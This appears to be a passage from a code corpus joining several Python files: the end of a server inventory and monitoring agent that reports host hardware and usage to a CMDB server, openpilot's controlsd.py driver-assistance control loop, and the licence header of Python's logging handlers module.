data = p.communicate()[0]
mem_total = data.split()[1]
memtotal = int(round(int(mem_total)/1024.0/1024.0, 0))
return memtotal
def get_cpu_model():
cmd = "cat /proc/cpuinfo"
p = Popen(cmd, stdout=PIPE, stderr = PIPE, shell = True)
stdout, stderr = p.communicate()
return stdout
def get_cpu_cores():
cpu_cores = {"physical": psutil.cpu_count(logical=False) if psutil.cpu_count(logical=False) else 0, "logical": psutil.cpu_count()}
return cpu_cores
def parser_cpu(stdout):
groups = [i for i in stdout.split('\n\n')]
group = groups[-2]
cpu_list = [i for i in group.split('\n')]
cpu_info = {}
for x in cpu_list:
k, v = [i.strip() for i in x.split(':')]
cpu_info[k] = v
return cpu_info
def get_disk_info():
ret = []
cmd = "fdisk -l|egrep '^Disk\s/dev/[a-z]+:\s\w*'"
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
for i in stdout.split('\n'):
disk_info = i.split(",")
if disk_info[0]:
ret.append(disk_info[0])
return ret
def post_data(url, data):
try:
r = requests.post(url, data)
if r.text:
logging.info(r.text)
else:
logging.info("Server return http status code: {0}".format(r.status_code))
except Exception as msg:
logging.info(msg)
return True
def asset_info():
data_info = dict()
data_info['memory'] = get_mem_total()
data_info['disk'] = str(get_disk_info())
cpuinfo = parser_cpu(get_cpu_model())
cpucore = get_cpu_cores()
data_info['cpu_num'] = cpucore['logical']
data_info['cpu_physical'] = cpucore['physical']
data_info['cpu_model'] = cpuinfo['model name']
data_info['ip'] = get_ip()
data_info['sn'] = parser_dmi(get_dmi())['Serial Number']
data_info['vendor'] = parser_dmi(get_dmi())['Manufacturer']
data_info['product'] = parser_dmi(get_dmi())['Version']
data_info['osver'] = platform.linux_distribution()[0] + " " + platform.linux_distribution()[1] + " " + platform.machine()
data_info['hostname'] = platform.node()
data_info['token'] = token
data_info['agent_version'] = AGENT_VERSION
return json.dumps(data_info)
def asset_info_post():
pversion = platform.python_version()
pv = re.search(r'2.6', pversion)
if not pv:
osenv = os.environ["LANG"]
os.environ["LANG"] = "us_EN.UTF8"
logging.info('Get the hardwave infos from host:')
logging.info(asset_info())
logging.info('----------------------------------------------------------')
post_data("http://{0}/cmdb/collect".format(server_ip), asset_info())
if not pv:
os.environ["LANG"] = osenv
return True
def get_sys_cpu():
sys_cpu = {}
cpu_time = psutil.cpu_times_percent(interval=1)
sys_cpu['percent'] = psutil.cpu_percent(interval=1)
sys_cpu['lcpu_percent'] = psutil.cpu_percent(interval=1, percpu=True)
sys_cpu['user'] = cpu_time.user
sys_cpu['nice'] = cpu_time.nice
sys_cpu['system'] = cpu_time.system
sys_cpu['idle'] = cpu_time.idle
sys_cpu['iowait'] = cpu_time.iowait
sys_cpu['irq'] = cpu_time.irq
sys_cpu['softirq'] = cpu_time.softirq
sys_cpu['guest'] = cpu_time.guest
return sys_cpu
def get_sys_mem():
sys_mem = {}
mem = psutil.virtual_memory()
sys_mem["total"] = mem.total/1024/1024
sys_mem["percent"] = mem.percent
sys_mem["available"] = mem.available/1024/1024
sys_mem["used"] = mem.used/1024/1024
sys_mem["free"] = mem.free/1024/1024
sys_mem["buffers"] = mem.buffers/1024/1024
sys_mem["cached"] = mem.cached/1024/1024
return sys_mem
def parser_sys_disk(mountpoint):
partitions_list = {}
d = psutil.disk_usage(mountpoint)
partitions_list['mountpoint'] = mountpoint
partitions_list['total'] = round(d.total/1024/1024/1024.0, 2)
partitions_list['free'] = round(d.free/1024/1024/1024.0, 2)
partitions_list['used'] = round(d.used/1024/1024/1024.0, 2)
partitions_list['percent'] = d.percent
return partitions_list
def get_sys_disk():
sys_disk = {}
partition_info = []
partitions = psutil.disk_partitions()
for p in partitions:
partition_info.append(parser_sys_disk(p.mountpoint))
sys_disk = partition_info
return sys_disk
# 函数获取各网卡发送、接收字节数
def get_nic():
key_info = psutil.net_io_counters(pernic=True).keys() # 获取网卡名称
recv = {}
sent = {}
for key in key_info:
recv.setdefault(key, psutil.net_io_counters(pernic=True).get(key).bytes_recv) # 各网卡接收的字节数
sent.setdefault(key, psutil.net_io_counters(pernic=True).get(key).bytes_sent) # 各网卡发送的字节数
return key_info, recv, sent
# 函数计算每秒速率
def get_nic_rate(func):
key_info, old_recv, old_sent = func() # 上一秒收集的数据
time.sleep(1)
key_info, now_recv, now_sent = func() # 当前所收集的数据
net_in = {}
net_out = {}
for key in key_info:
net_in.setdefault(key, (now_recv.get(key) - old_recv.get(key)) / 1024) # 每秒接收速率
net_out.setdefault(key, (now_sent.get(key) - old_sent.get(key)) / 1024) # 每秒发送速率
return key_info, net_in, net_out
def get_net_info():
net_info = []
key_info, net_in, net_out = get_nic_rate(get_nic)
for key in key_info:
in_data = net_in.get(key)
out_data = net_out.get(key)
net_info.append({"nic_name": key, "traffic_in": in_data, "traffic_out": out_data})
return net_info
def agg_sys_info():
logging.info('Get the system infos from host:')
sys_info = {'hostname': platform.node(),
'cpu': get_sys_cpu(),
'mem': get_sys_mem(),
'disk': get_sys_disk(),
'net': get_net_info(),
'token': token}
logging.info(sys_info)
json_data = json.dumps(sys_info)
logging.info('----------------------------------------------------------')
post_data("http://{0}/monitor/received/sys/info/".format(server_ip), json_data)
return True
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
def get_pid():
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
pid = str(os.getpid())
with open(BASE_DIR+"/adminsetd.pid", "wb+") as pid_file:
pid_file.writelines(pid)
if __name__ == "__main__":
get_pid()
asset_info_post()
time.sleep(1)
agg_sys_info()
schedule.every(3600).seconds.do(run_threaded, asset_info_post)
schedule.every(300).seconds.do(run_threaded, agg_sys_info)
while True:
schedule.run_pending()
time.sleep(1)
|
controlsd.py
|
#!/usr/bin/env python3
import os
import gc
import requests
import threading
from cereal import car, log
from selfdrive.crash import client
from common.android import ANDROID, get_sound_card_online
from common.numpy_fast import clip
from common.realtime import sec_since_boot, set_realtime_priority, set_core_affinity, Ratekeeper, DT_CTRL
from common.profiler import Profiler
from common.params import Params, put_nonblocking
import cereal.messaging as messaging
from selfdrive.config import Conversions as CV
from selfdrive.boardd.boardd import can_list_to_can_capnp
from selfdrive.car.car_helpers import get_car, get_startup_event
from selfdrive.controls.lib.drive_helpers import update_v_cruise, initialize_v_cruise
from selfdrive.controls.lib.longcontrol import LongControl, STARTING_TARGET_SPEED
from selfdrive.controls.lib.latcontrol_pid import LatControlPID
from selfdrive.controls.lib.latcontrol_indi import LatControlINDI
from selfdrive.controls.lib.latcontrol_lqr import LatControlLQR
from selfdrive.controls.lib.events import Events, ET
from selfdrive.controls.lib.alertmanager import AlertManager
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.controls.lib.planner import LON_MPC_STEP
from selfdrive.locationd.calibration_helpers import Calibration
from selfdrive.controls.lib.dynamic_follow.df_manager import dfManager
from common.op_params import opParams
LDW_MIN_SPEED = 31 * CV.MPH_TO_MS
LANE_DEPARTURE_THRESHOLD = 0.1
STEER_ANGLE_SATURATION_TIMEOUT = 1.0 / DT_CTRL
STEER_ANGLE_SATURATION_THRESHOLD = 2.5 # Degrees
ThermalStatus = log.ThermalData.ThermalStatus
State = log.ControlsState.OpenpilotState
HwType = log.HealthData.HwType
LongitudinalPlanSource = log.Plan.LongitudinalPlanSource
Desire = log.PathPlan.Desire
LaneChangeState = log.PathPlan.LaneChangeState
LaneChangeDirection = log.PathPlan.LaneChangeDirection
EventName = car.CarEvent.EventName
def log_fingerprint(candidate, timeout=30):
try:
requests.get('https://sentry.io', timeout=timeout)
client.captureMessage("fingerprinted {}".format(candidate), level='info')
return
except:
pass
class Controls:
def __init__(self, sm=None, pm=None, can_sock=None):
gc.disable()
set_realtime_priority(53)
set_core_affinity(3)
# Setup sockets
self.pm = pm
if self.pm is None:
self.pm = messaging.PubMaster(['sendcan', 'controlsState', 'carState',
'carControl', 'carEvents', 'carParams'])
self.sm = sm
if self.sm is None:
self.sm = messaging.SubMaster(['thermal', 'health', 'frame', 'model', 'liveCalibration',
'dMonitoringState', 'plan', 'pathPlan', 'liveLocationKalman'])
self.sm_smiskol = messaging.SubMaster(['radarState', 'dynamicFollowData', 'liveTracks', 'dynamicFollowButton',
'laneSpeed', 'dynamicCameraOffset', 'modelLongButton'])
self.op_params = opParams()
self.df_manager = dfManager(self.op_params)
self.hide_auto_df_alerts = self.op_params.get('hide_auto_df_alerts')
self.support_white_panda = self.op_params.get('support_white_panda')
self.last_model_long = False
self.can_sock = can_sock
if can_sock is None:
can_timeout = None if os.environ.get('NO_CAN_TIMEOUT', False) else 100
self.can_sock = messaging.sub_sock('can', timeout=can_timeout)
# wait for one health and one CAN packet
hw_type = messaging.recv_one(self.sm.sock['health']).health.hwType
has_relay = hw_type in [HwType.blackPanda, HwType.uno, HwType.dos]
print("Waiting for CAN messages...")
messaging.get_one_can(self.can_sock)
self.CI, self.CP, candidate = get_car(self.can_sock, self.pm.sock['sendcan'], has_relay)
threading.Thread(target=log_fingerprint, args=[candidate]).start()
# read params
params = Params()
self.is_metric = params.get("IsMetric", encoding='utf8') == "1"
self.is_ldw_enabled = params.get("IsLdwEnabled", encoding='utf8') == "1"
internet_needed = (params.get("Offroad_ConnectivityNeeded", encoding='utf8') is not None) and (params.get("DisableUpdates") != b"1")
community_feature_toggle = params.get("CommunityFeaturesToggle", encoding='utf8') == "1"
openpilot_enabled_toggle = params.get("OpenpilotEnabledToggle", encoding='utf8') == "1"
passive = params.get("Passive", encoding='utf8') == "1" or \
internet_needed or not openpilot_enabled_toggle
# detect sound card presence and ensure successful init
sounds_available = not ANDROID or get_sound_card_online()
car_recognized = self.CP.carName != 'mock'
# If stock camera is disconnected, we loaded car controls and it's not dashcam mode
controller_available = self.CP.enableCamera and self.CI.CC is not None and not passive
community_feature_disallowed = self.CP.communityFeature and not community_feature_toggle
self.read_only = not car_recognized or not controller_available or \
self.CP.dashcamOnly or community_feature_disallowed
if self.read_only:
self.CP.safetyModel = car.CarParams.SafetyModel.noOutput
# Write CarParams for radard and boardd safety mode
cp_bytes = self.CP.to_bytes()
params.put("CarParams", cp_bytes)
put_nonblocking("CarParamsCache", cp_bytes)
put_nonblocking("LongitudinalControl", "1" if self.CP.openpilotLongitudinalControl else "0")
self.CC = car.CarControl.new_message()
self.AM = AlertManager()
self.events = Events()
self.LoC = LongControl(self.CP, self.CI.compute_gb, candidate)
self.VM = VehicleModel(self.CP)
if self.CP.lateralTuning.which() == 'pid':
self.LaC = LatControlPID(self.CP)
elif self.CP.lateralTuning.which() == 'indi':
self.LaC = LatControlINDI(self.CP)
elif self.CP.lateralTuning.which() == 'lqr':
self.LaC = LatControlLQR(self.CP)
self.state = State.disabled
self.enabled = False
self.active = False
self.can_rcv_error = False
self.soft_disable_timer = 0
self.v_cruise_kph = 255
self.v_cruise_kph_last = 0
self.mismatch_counter = 0
self.can_error_counter = 0
self.last_blinker_frame = 0
self.saturated_count = 0
self.distance_traveled = 0
self.events_prev = []
self.current_alert_types = [ET.PERMANENT]
self.sm['liveCalibration'].calStatus = Calibration.INVALID
self.sm['thermal'].freeSpace = 1.
self.sm['dMonitoringState'].events = []
self.sm['dMonitoringState'].awarenessStatus = 1.
self.sm['dMonitoringState'].faceDetected = False
self.startup_event = get_startup_event(car_recognized, controller_available)
if not sounds_available:
self.events.add(EventName.soundsUnavailable, static=True)
if internet_needed:
self.events.add(EventName.internetConnectivityNeeded, static=True)
if community_feature_disallowed:
self.events.add(EventName.communityFeatureDisallowed, static=True)
if self.read_only and not passive:
self.events.add(EventName.carUnrecognized, static=True)
if not self.support_white_panda:
if hw_type == HwType.whitePanda:
self.events.add(EventName.whitePandaUnsupported, static=True)
# controlsd is driven by can recv, expected at 100Hz
self.rk = Ratekeeper(100, print_delay_threshold=None)
self.prof = Profiler(False) # off by default
def update_events(self, CS):
"""Compute carEvents from carState"""
self.events.clear()
self.events.add_from_msg(CS.events)
self.events.add_from_msg(self.sm['dMonitoringState'].events)
# Handle startup event
if self.startup_event is not None:
self.events.add(self.startup_event)
self.startup_event = None
# Create events for battery, temperature, disk space, and memory
if self.sm['thermal'].batteryPercent < 1 and self.sm['thermal'].chargingError:
# at zero percent battery, while discharging, OP should not allowed
self.events.add(EventName.lowBattery)
if self.sm['thermal'].thermalStatus >= ThermalStatus.red:
self.events.add(EventName.overheat)
if self.sm['thermal'].freeSpace < 0.07:
# under 7% of space free no enable allowed
self.events.add(EventName.outOfSpace)
if self.sm['thermal'].memUsedPercent > 90:
self.events.add(EventName.lowMemory)
# Handle calibration status
cal_status = self.sm['liveCalibration'].calStatus
if cal_status != Calibration.CALIBRATED:
if cal_status == Calibration.UNCALIBRATED:
self.events.add(EventName.calibrationIncomplete)
else:
self.events.add(EventName.calibrationInvalid)
# Handle lane change
if self.sm['pathPlan'].laneChangeState == LaneChangeState.preLaneChange:
direction = self.sm['pathPlan'].laneChangeDirection
if (CS.leftBlindspot and direction == LaneChangeDirection.left) or \
(CS.rightBlindspot and direction == LaneChangeDirection.right):
self.events.add(EventName.laneChangeBlocked)
else:
if direction == LaneChangeDirection.left:
self.events.add(EventName.preLaneChangeLeft)
else:
self.events.add(EventName.preLaneChangeRight)
elif self.sm['pathPlan'].laneChangeState in [LaneChangeState.laneChangeStarting,
LaneChangeState.laneChangeFinishing]:
self.events.add(EventName.laneChange)
if self.can_rcv_error or (not CS.canValid and self.sm.frame > 5 / DT_CTRL):
self.events.add(EventName.canError)
if self.mismatch_counter >= 200:
self.events.add(EventName.controlsMismatch)
if not self.sm.alive['plan'] and self.sm.alive['pathPlan']:
# only plan not being received: radar not communicating
self.events.add(EventName.radarCommIssue)
elif not self.sm.all_alive_and_valid():
self.events.add(EventName.commIssue)
if not self.sm['pathPlan'].mpcSolutionValid:
self.events.add(EventName.plannerError)
if not self.sm['liveLocationKalman'].sensorsOK and os.getenv("NOSENSOR") is None:
if self.sm.frame > 5 / DT_CTRL: # Give locationd some time to receive all the inputs
self.events.add(EventName.sensorDataInvalid)
if not self.sm['liveLocationKalman'].gpsOK and (self.distance_traveled > 1000) and os.getenv("NOSENSOR") is None and not self.support_white_panda:
# Not show in first 1 km to allow for driving out of garage. This event shows after 5 minutes
self.events.add(EventName.noGps)
if not self.sm['pathPlan'].paramsValid:
self.events.add(EventName.vehicleModelInvalid)
if not self.sm['liveLocationKalman'].posenetOK:
self.events.add(EventName.posenetInvalid)
if not self.sm['frame'].recoverState < 2:
# counter>=2 is active
self.events.add(EventName.focusRecoverActive)
if not self.sm['plan'].radarValid:
self.events.add(EventName.radarFault)
if self.sm['plan'].radarCanError:
self.events.add(EventName.radarCanError)
if log.HealthData.FaultType.relayMalfunction in self.sm['health'].faults:
self.events.add(EventName.relayMalfunction)
if self.sm['plan'].fcw:
self.events.add(EventName.fcw)
if self.sm['model'].frameDropPerc > 1:
self.events.add(EventName.modeldLagging)
# Only allow engagement with brake pressed when stopped behind another stopped car
if CS.brakePressed and self.sm['plan'].vTargetFuture >= STARTING_TARGET_SPEED \
and not self.CP.radarOffCan and CS.vEgo < 0.3:
self.events.add(EventName.noTarget)
self.add_stock_additions_alerts(CS)
def add_stock_additions_alerts(self, CS):
self.AM.SA_set_frame(self.sm.frame)
self.AM.SA_set_enabled(self.enabled)
# alert priority is defined by code location, keeping is highest, then lane speed alert, then auto-df alert
if self.sm_smiskol['modelLongButton'].enabled != self.last_model_long:
extra_text_1 = 'disabled!' if self.last_model_long else 'enabled!'
extra_text_2 = '' if self.last_model_long else ', model may slow unexpectedly'
self.AM.SA_add('modelLongAlert', extra_text_1=extra_text_1, extra_text_2=extra_text_2)
return
if self.sm_smiskol['dynamicCameraOffset'].keepingLeft:
self.AM.SA_add('laneSpeedKeeping', extra_text_1='LEFT', extra_text_2='Oncoming traffic in right lane')
return
elif self.sm_smiskol['dynamicCameraOffset'].keepingRight:
self.AM.SA_add('laneSpeedKeeping', extra_text_1='RIGHT', extra_text_2='Oncoming traffic in left lane')
return
ls_state = self.sm_smiskol['laneSpeed'].state
if ls_state != '':
self.AM.SA_add('lsButtonAlert', extra_text_1=ls_state)
return
faster_lane = self.sm_smiskol['laneSpeed'].fastestLane
if faster_lane in ['left', 'right']:
ls_alert = 'laneSpeedAlert'
if not self.sm_smiskol['laneSpeed'].new:
ls_alert += 'Silent'
self.AM.SA_add(ls_alert, extra_text_1='{} lane faster'.format(faster_lane).upper(), extra_text_2='Change lanes to faster {} lane'.format(faster_lane))
return
df_out = self.df_manager.update()
if df_out.changed:
df_alert = 'dfButtonAlert'
if df_out.is_auto and df_out.last_is_auto:
# only show auto alert if engaged, not hiding auto, and time since lane speed alert not showing
if CS.cruiseState.enabled and not self.hide_auto_df_alerts:
df_alert += 'Silent'
self.AM.SA_add(df_alert, extra_text_1=df_out.model_profile_text + ' (auto)')
return
else:
self.AM.SA_add(df_alert, extra_text_1=df_out.user_profile_text, extra_text_2='Dynamic follow: {} profile active'.format(df_out.user_profile_text))
return
def data_sample(self):
"""Receive data from sockets and update carState"""
# Update carState from CAN
can_strs = messaging.drain_sock_raw(self.can_sock, wait_for_one=True)
CS = self.CI.update(self.CC, can_strs)
self.sm.update(0)
self.sm_smiskol.update(0)
# Check for CAN timeout
if not can_strs:
self.can_error_counter += 1
self.can_rcv_error = True
else:
self.can_rcv_error = False
# When the panda and controlsd do not agree on controls_allowed
# we want to disengage openpilot. However the status from the panda goes through
# another socket other than the CAN messages and one can arrive earlier than the other.
# Therefore we allow a mismatch for two samples, then we trigger the disengagement.
if not self.enabled:
self.mismatch_counter = 0
if not self.sm['health'].controlsAllowed and self.enabled:
self.mismatch_counter += 1
self.distance_traveled += CS.vEgo * DT_CTRL
return CS
def state_transition(self, CS):
"""Compute conditional state transitions and execute actions on state transitions"""
self.v_cruise_kph_last = self.v_cruise_kph
# if stock cruise is completely disabled, then we can use our own set speed logic
if not self.CP.enableCruise:
self.v_cruise_kph = update_v_cruise(self.v_cruise_kph, CS.buttonEvents, self.enabled)
elif self.CP.enableCruise and CS.cruiseState.enabled:
self.v_cruise_kph = CS.cruiseState.speed * CV.MS_TO_KPH
# decrease the soft disable timer at every step, as it's reset on
# entrance in SOFT_DISABLING state
self.soft_disable_timer = max(0, self.soft_disable_timer - 1)
self.current_alert_types = [ET.PERMANENT]
# ENABLED, PRE ENABLING, SOFT DISABLING
if self.state != State.disabled:
# user and immediate disable always have priority in a non-disabled state
if self.events.any(ET.USER_DISABLE):
self.state = State.disabled
self.current_alert_types.append(ET.USER_DISABLE)
elif self.events.any(ET.IMMEDIATE_DISABLE):
self.state = State.disabled
self.current_alert_types.append(ET.IMMEDIATE_DISABLE)
else:
# ENABLED
if self.state == State.enabled:
if self.events.any(ET.SOFT_DISABLE):
self.state = State.softDisabling
self.soft_disable_timer = 300 # 3s
self.current_alert_types.append(ET.SOFT_DISABLE)
# SOFT DISABLING
elif self.state == State.softDisabling:
if not self.events.any(ET.SOFT_DISABLE):
# no more soft disabling condition, so go back to ENABLED
self.state = State.enabled
elif self.events.any(ET.SOFT_DISABLE) and self.soft_disable_timer > 0:
self.current_alert_types.append(ET.SOFT_DISABLE)
elif self.soft_disable_timer <= 0:
self.state = State.disabled
# PRE ENABLING
elif self.state == State.preEnabled:
if not self.events.any(ET.PRE_ENABLE):
self.state = State.enabled
else:
self.current_alert_types.append(ET.PRE_ENABLE)
# DISABLED
elif self.state == State.disabled:
if self.events.any(ET.ENABLE):
if self.events.any(ET.NO_ENTRY):
self.current_alert_types.append(ET.NO_ENTRY)
else:
if self.events.any(ET.PRE_ENABLE):
self.state = State.preEnabled
else:
self.state = State.enabled
self.current_alert_types.append(ET.ENABLE)
self.v_cruise_kph = initialize_v_cruise(CS.vEgo, CS.buttonEvents, self.v_cruise_kph_last)
# Check if actuators are enabled
self.active = self.state == State.enabled or self.state == State.softDisabling
if self.active:
self.current_alert_types.append(ET.WARNING)
# Check if openpilot is engaged
self.enabled = self.active or self.state == State.preEnabled
def state_control(self, CS):
"""Given the state, this function returns an actuators packet"""
plan = self.sm['plan']
path_plan = self.sm['pathPlan']
actuators = car.CarControl.Actuators.new_message()
if CS.leftBlinker or CS.rightBlinker:
self.last_blinker_frame = self.sm.frame
# State specific actions
if not self.active:
self.LaC.reset()
self.LoC.reset(v_pid=plan.vTargetFuture)
plan_age = DT_CTRL * (self.sm.frame - self.sm.rcv_frame['plan'])
# no greater than dt mpc + dt, to prevent too high extraps
dt = min(plan_age, LON_MPC_STEP + DT_CTRL) + DT_CTRL
a_acc_sol = plan.aStart + (dt / LON_MPC_STEP) * (plan.aTarget - plan.aStart)
v_acc_sol = plan.vStart + dt * (a_acc_sol + plan.aStart) / 2.0
extras_loc = {'lead_one': self.sm_smiskol['radarState'].leadOne, 'mpc_TR': self.sm_smiskol['dynamicFollowData'].mpcTR,
'live_tracks': self.sm_smiskol['liveTracks'], 'has_lead': plan.hasLead}
# Gas/Brake PID loop
actuators.gas, actuators.brake = self.LoC.update(self.active, CS, v_acc_sol, plan.vTargetFuture, a_acc_sol, self.CP, extras_loc)
# Steering PID loop and lateral MPC
actuators.steer, actuators.steerAngle, lac_log = self.LaC.update(self.active, CS, self.CP, path_plan)
# Check for difference between desired angle and angle for angle based control
angle_control_saturated = self.CP.steerControlType == car.CarParams.SteerControlType.angle and \
abs(actuators.steerAngle - CS.steeringAngle) > STEER_ANGLE_SATURATION_THRESHOLD
if angle_control_saturated and not CS.steeringPressed and self.active:
self.saturated_count += 1
else:
self.saturated_count = 0
# Send a "steering required alert" if saturation count has reached the limit
if (lac_log.saturated and not CS.steeringPressed) or \
(self.saturated_count > STEER_ANGLE_SATURATION_TIMEOUT):
# Check if we deviated from the path
left_deviation = actuators.steer > 0 and path_plan.dPoly[3] > 0.1
right_deviation = actuators.steer < 0 and path_plan.dPoly[3] < -0.1
if left_deviation or right_deviation:
self.events.add(EventName.steerSaturated)
return actuators, v_acc_sol, a_acc_sol, lac_log
def publish_logs(self, CS, start_time, actuators, v_acc, a_acc, lac_log):
"""Send actuators and hud commands to the car, send controlsstate and MPC logging"""
CC = car.CarControl.new_message()
CC.enabled = self.enabled
CC.actuators = actuators
CC.cruiseControl.override = True
CC.cruiseControl.cancel = not self.CP.enableCruise or (not self.enabled and CS.cruiseState.enabled)
# Some override values for Honda
# brake discount removes a sharp nonlinearity
brake_discount = (1.0 - clip(actuators.brake * 3., 0.0, 1.0))
speed_override = max(0.0, (self.LoC.v_pid + CS.cruiseState.speedOffset) * brake_discount)
CC.cruiseControl.speedOverride = float(speed_override if self.CP.enableCruise else 0.0)
CC.cruiseControl.accelOverride = self.CI.calc_accel_override(CS.aEgo, self.sm['plan'].aTarget, CS.vEgo, self.sm['plan'].vTarget)
CC.hudControl.setSpeed = float(self.v_cruise_kph * CV.KPH_TO_MS)
CC.hudControl.speedVisible = self.enabled
CC.hudControl.lanesVisible = self.enabled
CC.hudControl.leadVisible = self.sm['plan'].hasLead
right_lane_visible = self.sm['pathPlan'].rProb > 0.5
left_lane_visible = self.sm['pathPlan'].lProb > 0.5
CC.hudControl.rightLaneVisible = bool(right_lane_visible)
CC.hudControl.leftLaneVisible = bool(left_lane_visible)
recent_blinker = (self.sm.frame - self.last_blinker_frame) * DT_CTRL < 5.0 # 5s blinker cooldown
ldw_allowed = self.is_ldw_enabled and CS.vEgo > LDW_MIN_SPEED and not recent_blinker \
and not self.active and self.sm['liveCalibration'].calStatus == Calibration.CALIBRATED
meta = self.sm['model'].meta
if len(meta.desirePrediction) and ldw_allowed:
l_lane_change_prob = meta.desirePrediction[Desire.laneChangeLeft - 1]
r_lane_change_prob = meta.desirePrediction[Desire.laneChangeRight - 1]
CAMERA_OFFSET = self.op_params.get('camera_offset')
l_lane_close = left_lane_visible and (self.sm['pathPlan'].lPoly[3] < (1.08 - CAMERA_OFFSET))
r_lane_close = right_lane_visible and (self.sm['pathPlan'].rPoly[3] > -(1.08 + CAMERA_OFFSET))
CC.hudControl.leftLaneDepart = bool(l_lane_change_prob > LANE_DEPARTURE_THRESHOLD and l_lane_close)
CC.hudControl.rightLaneDepart = bool(r_lane_change_prob > LANE_DEPARTURE_THRESHOLD and r_lane_close)
if CC.hudControl.rightLaneDepart or CC.hudControl.leftLaneDepart:
self.events.add(EventName.ldw)
alerts = self.events.create_alerts(self.current_alert_types, [self.CP, self.sm, self.is_metric])
self.AM.add_many(self.sm.frame, alerts, self.enabled)
self.last_model_long = self.sm_smiskol['modelLongButton'].enabled
self.AM.process_alerts(self.sm.frame)
CC.hudControl.visualAlert = self.AM.visual_alert
if not self.read_only:
# send car controls over can
can_sends = self.CI.apply(CC)
self.pm.send('sendcan', can_list_to_can_capnp(can_sends, msgtype='sendcan', valid=CS.canValid))
force_decel = (self.sm['dMonitoringState'].awarenessStatus < 0.) or \
(self.state == State.softDisabling)
steer_angle_rad = (CS.steeringAngle - self.sm['pathPlan'].angleOffset) * CV.DEG_TO_RAD
# controlsState
dat = messaging.new_message('controlsState')
dat.valid = CS.canValid
controlsState = dat.controlsState
controlsState.alertText1 = self.AM.alert_text_1
controlsState.alertText2 = self.AM.alert_text_2
controlsState.alertSize = self.AM.alert_size
controlsState.alertStatus = self.AM.alert_status
controlsState.alertBlinkingRate = self.AM.alert_rate
controlsState.alertType = self.AM.alert_type
controlsState.alertSound = self.AM.audible_alert
controlsState.driverMonitoringOn = self.sm['dMonitoringState'].faceDetected
controlsState.canMonoTimes = list(CS.canMonoTimes)
controlsState.planMonoTime = self.sm.logMonoTime['plan']
controlsState.pathPlanMonoTime = self.sm.logMonoTime['pathPlan']
controlsState.enabled = self.enabled
controlsState.active = self.active
controlsState.vEgo = CS.vEgo
controlsState.vEgoRaw = CS.vEgoRaw
controlsState.angleSteers = CS.steeringAngle
controlsState.curvature = self.VM.calc_curvature(steer_angle_rad, CS.vEgo)
controlsState.steerOverride = CS.steeringPressed
controlsState.state = self.state
controlsState.engageable = not self.events.any(ET.NO_ENTRY)
controlsState.longControlState = self.LoC.long_control_state
controlsState.vPid = float(self.LoC.v_pid)
controlsState.vCruise = float(self.v_cruise_kph)
controlsState.upAccelCmd = float(self.LoC.pid.p)
controlsState.uiAccelCmd = float(self.LoC.pid.id)
controlsState.ufAccelCmd = float(self.LoC.pid.f)
controlsState.angleSteersDes = float(self.LaC.angle_steers_des)
controlsState.vTargetLead = float(v_acc)
controlsState.aTarget = float(a_acc)
controlsState.jerkFactor = float(self.sm['plan'].jerkFactor)
controlsState.gpsPlannerActive = self.sm['plan'].gpsPlannerActive
controlsState.vCurvature = self.sm['plan'].vCurvature
controlsState.decelForModel = self.sm['plan'].longitudinalPlanSource == LongitudinalPlanSource.model
controlsState.cumLagMs = -self.rk.remaining * 1000.
controlsState.startMonoTime = int(start_time * 1e9)
controlsState.mapValid = self.sm['plan'].mapValid
controlsState.forceDecel = bool(force_decel)
controlsState.canErrorCounter = self.can_error_counter
if self.CP.lateralTuning.which() == 'pid':
controlsState.lateralControlState.pidState = lac_log
elif self.CP.lateralTuning.which() == 'lqr':
controlsState.lateralControlState.lqrState = lac_log
elif self.CP.lateralTuning.which() == 'indi':
controlsState.lateralControlState.indiState = lac_log
self.pm.send('controlsState', dat)
# carState
car_events = self.events.to_msg()
cs_send = messaging.new_message('carState')
cs_send.valid = CS.canValid
cs_send.carState = CS
cs_send.carState.events = car_events
self.pm.send('carState', cs_send)
# carEvents - logged every second or on change
if (self.sm.frame % int(1. / DT_CTRL) == 0) or (self.events.names != self.events_prev):
ce_send = messaging.new_message('carEvents', len(self.events))
ce_send.carEvents = car_events
self.pm.send('carEvents', ce_send)
self.events_prev = self.events.names.copy()
# carParams - logged every 50 seconds (> 1 per segment)
if (self.sm.frame % int(50. / DT_CTRL) == 0):
cp_send = messaging.new_message('carParams')
cp_send.carParams = self.CP
self.pm.send('carParams', cp_send)
# carControl
cc_send = messaging.new_message('carControl')
cc_send.valid = CS.canValid
cc_send.carControl = CC
self.pm.send('carControl', cc_send)
# copy CarControl to pass to CarInterface on the next iteration
self.CC = CC
def step(self):
start_time = sec_since_boot()
self.prof.checkpoint("Ratekeeper", ignore=True)
# Sample data from sockets and get a carState
CS = self.data_sample()
self.prof.checkpoint("Sample")
self.update_events(CS)
if not self.read_only:
# Update control state
self.state_transition(CS)
self.prof.checkpoint("State transition")
# Compute actuators (runs PID loops and lateral MPC)
actuators, v_acc, a_acc, lac_log = self.state_control(CS)
self.prof.checkpoint("State Control")
# Publish data
self.publish_logs(CS, start_time, actuators, v_acc, a_acc, lac_log)
self.prof.checkpoint("Sent")
def controlsd_thread(self):
while True:
self.step()
self.rk.monitor_time()
self.prof.display()
def main(sm=None, pm=None, logcan=None):
controls = Controls(sm, pm, logcan)
controls.controlsd_thread()
if __name__ == "__main__":
main()
|
handlers.py
|
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
